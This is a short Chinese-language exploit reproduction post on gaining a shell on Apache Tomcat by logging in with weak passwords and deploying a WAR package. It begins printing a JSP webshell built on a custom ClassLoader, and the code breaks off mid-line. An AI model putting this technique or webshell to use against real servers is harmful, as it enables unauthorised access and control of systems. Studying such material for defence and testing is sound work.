【漏洞复现】 tomcat-pass-getshell 弱口令

【漏洞复现】 tomcat-pass-getshell 弱口令

文章目录

  • 【漏洞复现】 tomcat-pass-getshell 弱口令
  • 漏洞介绍
  • poc
  • exp
  • 扫描工具

漏洞介绍

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。

通过弱口令登录后台,部署war包geshell

poc

【漏洞复现】 tomcat-pass-getshell 弱口令_第1张图片

弱口令登录平台 ༼ つ ◕_◕ ༽つ

exp

  • webshell.jsp木马
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.d

你可能感兴趣的:(优秀文章,tomcat,java,servlet)